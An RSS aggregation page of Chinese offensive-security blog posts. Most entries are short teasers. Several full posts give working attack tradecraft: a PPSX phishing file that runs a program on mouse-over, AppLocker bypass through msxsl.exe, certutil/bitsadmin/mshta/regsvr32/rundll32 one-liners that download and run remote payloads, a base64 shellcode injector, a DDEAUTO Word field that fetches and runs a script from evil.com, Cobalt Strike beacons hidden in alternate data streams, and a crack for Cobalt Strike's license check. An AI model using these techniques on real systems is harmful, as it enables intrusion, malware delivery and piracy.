Embed this content in your HTML

Search

Edit this Super RSS.
Account: (login)

More Channels


Channel Catalog


Channel Description:

all things
    0 0

    说 OAuth2.0 漏洞/这个协议不安全的人,把头伸过来下,砖头准备好了。 Black Hat 的有关 Pa […]

    0 0
  • 11/08/16--00:28: 记第10次印刷 (chan 69772724)
  • 《Web前端黑客技术揭秘》这本书2013.1月开售至今,已经第10次印刷,在安全类书籍中,这种成绩确实超出我们 […]

    0 0

    Seebug Paper之前收录了三篇文章有些关联性,分别是: 绕过混合内容警告 – 在安全的页面 […]

    0 0

    当代 Web 的 JSON 劫持技巧 http://paper.seebug.org/130/ 猥琐流的家伙居 […]

    0 0
  • 12/01/16--19:47: [PRE]CSRF攻击-进击的巨人 (chan 69772724)
  • 计划准备出一个PPT专门讲解CSRF里的各种奇技淫巧,除了那些老套的手法之外: https://github. […]

    0 0

    新年新气象,这个蠕虫我做了小范围测试,也提交了官方修复,小圈子里做了分享,这里正式对外公布下,出于研究而非破坏 […]

    0 0
  • 03/05/17--00:37: 蠕虫挖矿一例,无码 (chan 69772724)
  • 今天凌晨,我们的蜜网系统跳出了个有趣的字符串: zaxa2aq@protonmail.com ProtonMa […]

    0 0
  • 05/18/17--19:39: 前端黑在线工具 XSS’OR (chan 69772724)
  • 这是一个在线免费的前端黑工具,目前主要包含 3 大模块: 1. Encode/Decode 加解密模块,包含: […]

    0 0
  • 06/20/17--23:41: 构造PPSX钓鱼文件 (chan 69772723)
  • 之前出现了一种新型的钓鱼攻击的手法,即通过PPT在未开启宏的情况下,执行程序,关于这个Freebuf也有相关文章进行介绍,《新型PPT钓鱼攻击分析》《无需宏,PPT也能用来投递恶意程序》。但是文中都未介绍怎么制作这种文件,所以,今天在这里分享一下制作该文件的方法,希望大家了解并对此进行防御。

    首先,创建一个普通的PPTX文件,随便填入一些内容,如下图:
    1.png

    之后插入一个动作按钮,具体位置如下图:
    2.png

    这里要选择空白的那个,选择以后,在页面中拉出一个触发位置,之后会弹出动作设置的界面:
    3.png

    选择鼠标移过->运行程序:
    4.png

    选择要运行的程序可在后面直接加参数,如计算器,之后点击确定。
    5.png
    现在显示为一个有色区域,所以要对他进行设置,右键->设置形状格式,将填充和线条颜色改成无
    6.png

    最后将文件保存为PPSX文件即可。

    最终效果:

    2.gif


    0 0

    XSS’OR 开源了。采用 BSD 开源协议,很宽松,不限制传播与商业化,留下作者版权就好。在下面 […]

    0 0
  • 07/07/17--00:28: Bypass AppLocker With MSXSL.EXE (chan 69772723)
  • 关于XSLT之前已经有几篇文章进行介绍了,Hack With XSLTXXE with XSLXsl Exec Webshell ,今天分享一个通过MSXSL.exe绕过Applocker的方法。
    msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。下载地址为:戳我

    msxsl.exe 需要接受两个文件,XML及XSL文件,命令行操作如下:

    msxsl.exe demo.xml exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
     
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
     
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    1.gif

    同样的,msxsl.exe可以远程加载,具体方式如下:

    msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
    

    0 0
  • 07/24/17--01:59: powershell 通过IE下载文件 (chan 69772723)
  • $ie = New-Object -Com internetExplorer.Application
    $ie.Navigate("https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe")
    
    #------------------------------
    #Wait for Download Dialog box to pop up
    Sleep 5
    while($ie.Busy){Sleep 1}
    #------------------------------
    
    #Hit "S" on the keyboard to hit the "Save" button on the download box
    $obj = new-object -com WScript.Shell
    $obj.AppActivate('Internet Explorer')
    $obj.SendKeys('s')
    
    #Hit "Enter" to save the file
    $obj.SendKeys('{Enter}')
    
    #Closes IE Downloads window
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{Enter}')
    
    

    原文:戳我


    0 0
  • 08/03/17--18:25: Some Tricks (chan 69772723)
  • 远程执行sct的另一种姿势

    cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    detail:https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd

    命令行下载姿势1

    bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip
    bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip
    bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"
    

    命令行下载姿势2

    certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt
    

    清除缓存 certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete

    命令行执行远程JS

    certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    命令行远程执行VBS

    certutil -urlcache -split -f http://192.168.254.102:80/abc a.vbs && cscript a.vbs &&  del a.vbs && certutil -urlcache -split -f http://192.168.254.102:80/abc delete
    

    命令行远程执行HTA

    mshta http://192.168.254.102/1.hta
    

    0 0
  • 08/31/17--19:23: 渗透中的ADS (chan 69772723)
  • 为了测试,在这里使用Cobaltstrike 生成一个exe,用来查看文件是否上传成功,并可以顺利执行,每次上传文件以后,服务器自动删除,如下图:
    1504229593529.png

    PS: meterpreter会话是通过powershell web_delivery获取的

    尝试创建文件夹成功:
    1504229703126.png

    将文件上传至特殊目录:

    upload /tmp/beacon.exe \\\\.\\c:\\WINDOWS\\debug\\WIA\\123:aa.exe
    

    upload /tmp/beacon.exe 123:aa.exe也可以,这是写到了当前目录。

    上传以后进入shell 可使用 dir /r来查看
    1504229856372.png

    可以看到成功写入了,之后使用WMIC来执行,命令如下:

    wmic process call create \\.\c:\WINDOWS\debug\WIA\123:aa.exe
    wmic process call create C:\WINDOWS\debug\WIA\123:aa.exe //当前目录使用,需要绝对路径
    

    也可以使用msf来执行

    execute -cH -f "\\\\.\\c:\\WINDOWS\\debug\\WIA\\123:aa.exe"
    

    1504229982741.png

    到cobal里面可以看到会话。

    如果有权限的话,可使用certutil下载文件到ADS

    certutil -urlcache -split -f http://url/test.exe \\.\c:\WINDOWS\debug\WIA\123:aa.exe
    

    删除certutil缓存

    certutil.exe -urlcache -split -f http://url/test.exe delete
    

    测试时发现一个有趣的东西,使用test:
    1.gif

    使用nul
    test.gif

    测试发现,如果想要dir /s 里面看不到ADS,可以使用的文件为:

    \\.\C:\test\COM1
    \\.\C:\test\COM2
    ...
    \\.\C:\test\COM9
    \\.\C:\test\nul
    

    并且这些文件是不可以直接删除的,要删除的话使用如下命令:

    del \\.\C:\test\nul
    

    再分享一下怎么样带参数执行ADS文件,其实可以借助于MSF,具体命令如下

    execute -iH -f "c:\\文件路径\\123:1.exe" -a "文件参数"
    

    效果如下图:
    1504257989079.png

    使用msf删除ADS,可直接使用rm 加绝对路径即可,如下图:
    1504258209654.png


    0 0
  • 09/06/17--22:50: cobaltstrike3.8 破解版 (chan 69772723)
  • C568E2BB-3369-4EB1-993A-EBEA12790162.png
    之前一直想下载3.8,但是没下载到,看到小伙伴留言发了一个试用版的链接(安全性未知)。
    B49E21D6-8C9D-405B-AA10-B0B3B3275F95.png

    链接:https://f001.backblazeb2.com/file/thedarkcloud/cobaltstrike/cobaltstrike-trial.tgz

    然后就下载了一下,发现这个并不是破解版。如下图:
    E0C37677-323F-4D1A-A00D-0CC6068D73A1.png

    所以就对其进行了简单的修改,并把方法分享给大家,以便大家使用。
    首先,对cobaltstrike.jar进行解压,解压以后找到common\License.class,使用jad进行反编译。

    C:\Users\evi1cg\Desktop\jad>jad License.class
    Parsing License.class... Generating License.jad
    

    之后编辑License.jad文件,修改以下参数。找到life,修改为65535L:

    4E7F56F9-72A6-4038-BAD5-778BC8FAF54C.png

    之后将License.jad重命名为License.java,置于解压以后的CobaltStrike的根目录,之后使用javac进行编译。

    javac -classpath . License.java
    

    编译以后得到License.class,使用winrar打开未解压的CobaltStrike,使用修改后的License.class替换原来的License.class即可。

    如果不想打开的时候弹框,可使用以下License.java进行编译

    package common;
    
    import aggressor.Prefs;
    
    public class License
    {
    
        public License()
        {
        }
    
        private static long getTimeSinceStart()
        {
            Prefs prefs = Prefs.getPreferences();
            today = System.currentTimeMillis();
            start = prefs.getLongNumber("cobaltstrike.start.int", 0L);
            if(start == 0L)
            {
                prefs.set("cobaltstrike.start.int", (new StringBuilder()).append("").append(today).append("").toString());
                prefs.save();
                start = today;
            }
            difference = (today - start) / 0x5265c00L;
            return difference;
        }
    
        public static void checkLicenseGUI()
        {
            getTimeSinceStart();
        }
    
        public static boolean isTrial()
        {
            return true;
        }
    
        public static void checkLicenseConsole()
        {
        }
    
        private static long life = 65535L;
        private static long today = 0L;
        private static long start = 0L;
        private static long difference = 0L;
    
    }
    

    在这里有个坑,参照这个文章进行破解是有问题的,他直接修改了common.License.isTrial()的返回值为flase。

    public static boolean isTrial()
      {
        return true;
        // 必须修改函数
        // return false; //edit here
      }
    

    导致在ArtifactUtils类中处理函数XorEncode直接走向payload的Encode。

        public static byte[] XorEncode(byte data[], String arch)
        {
            if(License.isTrial())
            {
                CommonUtils.print_trial((new StringBuilder()).append("Disabled ").append(arch).append(" payload stage encoding.").toString());
                return data;
            }
            AssertUtils.Test(data.length > 16384, "XorEncode used on a stager (or some other small thing)");
            AssertUtils.TestArch(arch);
            if("x86".equals(arch))
            {
                byte decoder[] = CommonUtils.pickOption("resources/xor.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            }
            if("x64".equals(arch))
            {
                byte decoder[] = CommonUtils.readResource("resources/xor64.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            } else
            {
                return new byte[0];
            }
        }
    

    但是由于试用版不存在xor.bin以及xor64.bin,所以会导致无法创建监听。所以我们还是只改时间好了。然后我们的cs就可以使用了,缺点就是不能加密payload。

    5CE4860A-6B52-4E1F-A895-48EBFE03657F.png

    修改版下载链接: 链接: 戳我 密码: 86f3 安全性请自行验证!!


    0 0
  • 10/04/17--00:17: WordPress防火墙 (chan 69772724)
  • 用了很久了,推荐下这个: Wordfence Security 细节自己体验吧,说点别的。 WordPress […]

    0 0
  • 10/10/17--19:59: MSWord Code Exec Without Macro (chan 69772723)
  • 今天学到了一个新的Word执行代码的方式,也是不需要启用宏的,所以分享给大家一波。操作也挺简单的。
    首先新建一个word文档,然后插入域:

    1507690693509.png

    选择 = (Formula)

    1507690775534.png

    右键,切换域代码

    1507690814044.png

    代码处修改为:

    {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }
    

    1507690880290.png

    之后,右键更新域,再把文档改成docx格式即可。最终效果如下:

    2.gif

    比较鸡肋的是点是以后才会执行。

    除了使用DDEAUTO,使用DDE也是可以的,具体如下:

    {DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }
    

    需要注意的是,使用DDE不会自动执行,需要对文档进行修改,将文档重命名为rar,打开以后修改 word/settings.xml,添加

    <w:updateFields w:val="true"/>
    

    使用DDE效果如下:

    dde.gif

    个人感觉使用DDE效果更好点。

    如何获取交互式shell ?

    { DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "}
    

    0 0

    经常有小伙伴碰到了命令执行漏洞不会玩,比如mssql注入点的命令执行,怎么来获取一个meterpreter?这个时候,就需要想办法来获取了,关于命令行来执行远程命令的方法碰到很多,但是用的时候老会记不起来,所以在这里把碰到的作为一个总结,没准那种方法能帮到你。(当然,我们这里不说可以直接echo webshell的情形)

    1、powershell

    eg:

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
    

    2、regsvr32

    eg:

    regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
    

    js.png

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
                ps  = "cmd.exe /c calc.exe";
                new ActiveXObject("WScript.Shell").Run(ps,0,true);
    
            ]]>
    </script>
    </registration>
    </scriptlet>
    

    3、rundll32

    eg:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
    

    细节:看我

    4、mshta

    eg:

    mshta http://site.com/calc.hta
    

    calc.hta

    <HTML>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <HEAD>
    <script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
    self.close
    </script>
    <body>
    demo
    </body>
    </HEAD>
    </HTML>
    

    5、pubprn.vbs

    eg:

    cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    6、bitsadmin

    eg:

    cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
    

    7、python(需安装)

    eg:

    python -c "import urllib2; exec urllib2.urlopen('http://site.com/abc').read();"
    

    abc

    import base64; exec base64.b64decode("aW1wb3J0IGN0eXBlcwppbXBvcnQgcGxhdGZvcm0KCihhcmNoLCB0eXBlKSA9IHBsYXRmb3JtLmFyY2hpdGVjdHVyZSgpCgojIDMyLWJpdCBQeXRob24KaWYgYXJjaCA9PSAiMzJiaXQiOgoJc2hlbGxjb2RlID0gIlx4ZmNceGU4XHg4OVx4MDBceDAwXHgwMFx4NjBceDg5XHhlNVx4MzFceGQyXHg2NFx4OGJceDUyXHgzMFx4OGJceDUyXHgwY1x4OGJceDUyXHgxNFx4OGJceDcyXHgyOFx4MGZceGI3XHg0YVx4MjZceDMxXHhmZlx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4YzFceGNmXHgwZFx4MDFceGM3XHhlMlx4ZjBceDUyXHg1N1x4OGJceDUyXHgxMFx4OGJceDQyXHgzY1x4MDFceGQwXHg4Ylx4NDBceDc4XHg4NVx4YzBceDc0XHg0YVx4MDFceGQwXHg1MFx4OGJceDQ4XHgxOFx4OGJceDU4XHgyMFx4MDFceGQzXHhlM1x4M2NceDQ5XHg4Ylx4MzRceDhiXHgwMVx4ZDZceDMxXHhmZlx4MzFceGMwXHhhY1x4YzFceGNmXHgwZFx4MDFceGM3XHgzOFx4ZTBceDc1XHhmNFx4MDNceDdkXHhmOFx4M2JceDdkXHgyNFx4NzVceGUyXHg1OFx4OGJceDU4XHgyNFx4MDFceGQzXHg2Nlx4OGJceDBjXHg0Ylx4OGJceDU4XHgxY1x4MDFceGQzXHg4Ylx4MDRceDhiXHgwMVx4ZDBceDg5XHg0NFx4MjRceDI0XHg1Ylx4NWJceDYxXHg1OVx4NWFceDUxXHhmZlx4ZTBceDU4XHg1Zlx4NWFceDhiXHgxMlx4ZWJceDg2XHg1ZFx4NjhceDZlXHg2NVx4NzRceDAwXHg2OFx4NzdceDY5XHg2ZVx4NjlceDU0XHg2OFx4NGNceDc3XHgyNlx4MDdceGZmXHhkNVx4ZThceDgwXHgwMFx4MDBceDAwXHg0ZFx4NmZceDdhXHg2OVx4NmNceDZjXHg2MVx4MmZceDM1XHgyZVx4MzBceDIwXHgyOFx4NjNceDZmXHg2ZFx4NzBceDYxXHg3NFx4NjlceDYyXHg2Y1x4NjVceDNiXHgyMFx4NGRceDUzXHg0OVx4NDVceDIwXHgzOVx4MmVceDMwXHgzYlx4MjBceDU3XHg2OVx4NmVceDY0XHg2Zlx4NzdceDczXHgyMFx4NGVceDU0XHgyMFx4MzZceDJlXHgzMVx4M2JceDIwXHg1N1x4NGZceDU3XHgzNlx4MzRceDNiXHgyMFx4NTRceDcyXHg2OVx4NjRceDY1XHg2ZVx4NzRceDJmXHgzNVx4MmVceDMwXHgzYlx4MjBceDQyXHg0Zlx4NDlceDQ1XHgzOVx4M2JceDQ1XHg0ZVx4NTVceDUzXHg0ZFx4NTNceDQ1XHgyOVx4MDBceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4MDBceDU5XHgzMVx4ZmZceDU3XHg1N1x4NTdceDU3XHg1MVx4NjhceDNhXHg1Nlx4NzlceGE3XHhmZlx4ZDVceGViXHg3OVx4NWJceDMxXHhjOVx4NTFceDUxXHg2YVx4MDNceDUxXHg1MVx4NjhceGI4XHgyMlx4MDBceDAwXHg1M1x4NTBceDY4XHg1N1x4ODlceDlmXHhjNlx4ZmZceGQ1XHhlYlx4NjJceDU5XHgzMVx4ZDJceDUyXHg2OFx4MDBceDAyXHg2MFx4ODRceDUyXHg1Mlx4NTJceDUxXHg1Mlx4NTBceDY4XHhlYlx4NTVceDJlXHgzYlx4ZmZceGQ1XHg4OVx4YzZceDMxXHhmZlx4NTdceDU3XHg1N1x4NTdceDU2XHg2OFx4MmRceDA2XHgxOFx4N2JceGZmXHhkNVx4ODVceGMwXHg3NFx4NDRceDMxXHhmZlx4ODVceGY2XHg3NFx4MDRceDg5XHhmOVx4ZWJceDA5XHg2OFx4YWFceGM1XHhlMlx4NWRceGZmXHhkNVx4ODlceGMxXHg2OFx4NDVceDIxXHg1ZVx4MzFceGZmXHhkNVx4MzFceGZmXHg1N1x4NmFceDA3XHg1MVx4NTZceDUwXHg2OFx4YjdceDU3XHhlMFx4MGJceGZmXHhkNVx4YmZceDAwXHgyZlx4MDBceDAwXHgzOVx4YzdceDc0XHhiY1x4MzFceGZmXHhlYlx4MTVceGViXHg0OVx4ZThceDk5XHhmZlx4ZmZceGZmXHgyZlx4NTJceDYyXHg0Nlx4NjJceDAwXHgwMFx4NjhceGYwXHhiNVx4YTJceDU2XHhmZlx4ZDVceDZhXHg0MFx4NjhceDAwXHgxMFx4MDBceDAwXHg2OFx4MDBceDAwXHg0MFx4MDBceDU3XHg2OFx4NThceGE0XHg1M1x4ZTVceGZmXHhkNVx4OTNceDUzXHg1M1x4ODlceGU3XHg1N1x4NjhceDAwXHgyMFx4MDBceDAwXHg1M1x4NTZceDY4XHgxMlx4OTZceDg5XHhlMlx4ZmZceGQ1XHg4NVx4YzBceDc0XHhjZFx4OGJceDA3XHgwMVx4YzNceDg1XHhjMFx4NzVceGU1XHg1OFx4YzNceGU4XHgzN1x4ZmZceGZmXHhmZlx4MzFceDMwXHgzM1x4MmVceDMyXHgzM1x4MzhceDJlXHgzMlx4MzJceDM1XHgyZVx4MzFceDMyXHgzOVx4MDAiCgojIDY0LWJpdCBQeXRob24KZWxpZiBhcmNoID09ICI2NGJpdCI6CglzaGVsbGNvZGUgPSAiXHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjOFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDY2XHg4MVx4NzhceDE4XHgwYlx4MDJceDc1XHg3Mlx4OGJceDgwXHg4OFx4MDBceDAwXHgwMFx4NDhceDg1XHhjMFx4NzRceDY3XHg0OFx4MDFceGQwXHg1MFx4OGJceDQ4XHgxOFx4NDRceDhiXHg0MFx4MjBceDQ5XHgwMVx4ZDBceGUzXHg1Nlx4NDhceGZmXHhjOVx4NDFceDhiXHgzNFx4ODhceDQ4XHgwMVx4ZDZceDRkXHgzMVx4YzlceDQ4XHgzMVx4YzBceGFjXHg0MVx4YzFceGM5XHgwZFx4NDFceDAxXHhjMVx4MzhceGUwXHg3NVx4ZjFceDRjXHgwM1x4NGNceDI0XHgwOFx4NDVceDM5XHhkMVx4NzVceGQ4XHg1OFx4NDRceDhiXHg0MFx4MjRceDQ5XHgwMVx4ZDBceDY2XHg0MVx4OGJceDBjXHg0OFx4NDRceDhiXHg0MFx4MWNceDQ5XHgwMVx4ZDBceDQxXHg4Ylx4MDRceDg4XHg0OFx4MDFceGQwXHg0MVx4NThceDQxXHg1OFx4NWVceDU5XHg1YVx4NDFceDU4XHg0MVx4NTlceDQxXHg1YVx4NDhceDgzXHhlY1x4MjBceDQxXHg1Mlx4ZmZceGUwXHg1OFx4NDFceDU5XHg1YVx4NDhceDhiXHgxMlx4ZTlceDRmXHhmZlx4ZmZceGZmXHg1ZFx4NmFceDAwXHg0OVx4YmVceDc3XHg2OVx4NmVceDY5XHg2ZVx4NjVceDc0XHgwMFx4NDFceDU2XHg0OVx4ODlceGU2XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceGU4XHg4MFx4MDBceDAwXHgwMFx4NGRceDZmXHg3YVx4NjlceDZjXHg2Y1x4NjFceDJmXHgzNVx4MmVceDMwXHgyMFx4MjhceDYzXHg2Zlx4NmRceDcwXHg2MVx4NzRceDY5XHg2Mlx4NmNceDY1XHgzYlx4MjBceDRkXHg1M1x4NDlceDQ1XHgyMFx4MzlceDJlXHgzMFx4M2JceDIwXHg1N1x4NjlceDZlXHg2NFx4NmZceDc3XHg3M1x4MjBceDRlXHg1NFx4MjBceDM2XHgyZVx4MzFceDNiXHgyMFx4NTdceDRmXHg1N1x4MzZceDM0XHgzYlx4MjBceDU0XHg3Mlx4NjlceDY0XHg2NVx4NmVceDc0XHgyZlx4MzVceDJlXHgzMFx4M2JceDIwXHg0Mlx4NGZceDQ5XHg0NVx4MzlceDNiXHg0NVx4NGVceDU1XHg1M1x4NGRceDUzXHg0NVx4MjlceDAwXHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDAwXHg1OVx4NDhceDMxXHhkMlx4NGRceDMxXHhjMFx4NGRceDMxXHhjOVx4NDFceDUwXHg0MVx4NTBceDQxXHhiYVx4M2FceDU2XHg3OVx4YTdceGZmXHhkNVx4ZWJceDYxXHg1YVx4NDhceDg5XHhjMVx4NDFceGI4XHhiOFx4MjJceDAwXHgwMFx4NGRceDMxXHhjOVx4NDFceDUxXHg0MVx4NTFceDZhXHgwM1x4NDFceDUxXHg0MVx4YmFceDU3XHg4OVx4OWZceGM2XHhmZlx4ZDVceGViXHg0NFx4NDhceDg5XHhjMVx4NDhceDMxXHhkMlx4NDFceDU4XHg0ZFx4MzFceGM5XHg1Mlx4NjhceDAwXHgwMlx4NjBceDg0XHg1Mlx4NTJceDQxXHhiYVx4ZWJceDU1XHgyZVx4M2JceGZmXHhkNVx4NDhceDg5XHhjNlx4NmFceDBhXHg1Zlx4NDhceDg5XHhmMVx4NDhceDMxXHhkMlx4NGRceDMxXHhjMFx4NGRceDMxXHhjOVx4NTJceDUyXHg0MVx4YmFceDJkXHgwNlx4MThceDdiXHhmZlx4ZDVceDg1XHhjMFx4NzVceDFkXHg0OFx4ZmZceGNmXHg3NFx4MTBceGViXHhkZlx4ZWJceDYzXHhlOFx4YjdceGZmXHhmZlx4ZmZceDJmXHg2Ylx4NTRceDQ4XHg1Nlx4MDBceDAwXHg0MVx4YmVceGYwXHhiNVx4YTJceDU2XHhmZlx4ZDVceDQ4XHgzMVx4YzlceGJhXHgwMFx4MDBceDQwXHgwMFx4NDFceGI4XHgwMFx4MTBceDAwXHgwMFx4NDFceGI5XHg0MFx4MDBceDAwXHgwMFx4NDFceGJhXHg1OFx4YTRceDUzXHhlNVx4ZmZceGQ1XHg0OFx4OTNceDUzXHg1M1x4NDhceDg5XHhlN1x4NDhceDg5XHhmMVx4NDhceDg5XHhkYVx4NDFceGI4XHgwMFx4MjBceDAwXHgwMFx4NDlceDg5XHhmOVx4NDFceGJhXHgxMlx4OTZceDg5XHhlMlx4ZmZceGQ1XHg0OFx4ODNceGM0XHgyMFx4ODVceGMwXHg3NFx4YjZceDY2XHg4Ylx4MDdceDQ4XHgwMVx4YzNceDg1XHhjMFx4NzVceGQ3XHg1OFx4NThceGMzXHhlOFx4MzVceGZmXHhmZlx4ZmZceDMxXHgzMFx4MzNceDJlXHgzMlx4MzNceDM4XHgyZVx4MzJceDMyXHgzNVx4MmVceDMxXHgzMlx4MzlceDAwIiAKZWxzZToKCXNoZWxsY29kZSA9ICIiCgojIHNhbml0eSBjaGVjayBvdXIgc2l0dWF0aW9uCmlmIHR5cGUgIT0gIldpbmRvd3NQRSIgb3IgbGVuKHNoZWxsY29kZSkgPT0gMDoKCXF1aXQoKQoKIyBpbmplY3Qgb3VyIHNoZWxsY29kZQpyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSkKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgcnd4cGFnZSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEpCg==")
    

    8、certutil

    eg:

    certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    9、msiexec

    msiexec /q /i http://site.com/payloads/calc.png
    

    calc.png

    msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
    

    10、msxsl.exe(需下载)

    eg:

    msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
    
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
    
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    11、IEExec

    eg:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://site.com/files/test64.exe
    

    细节:戳我

    12、IEXPLORE.EXE

    这个需要IE存在可执行命令的漏洞
    eg:

    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp
    

    exp可以使用类似ms14_064

    方式应该还有很多,欢迎留言补充!!


    0 0

    最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题:
    1.jpg

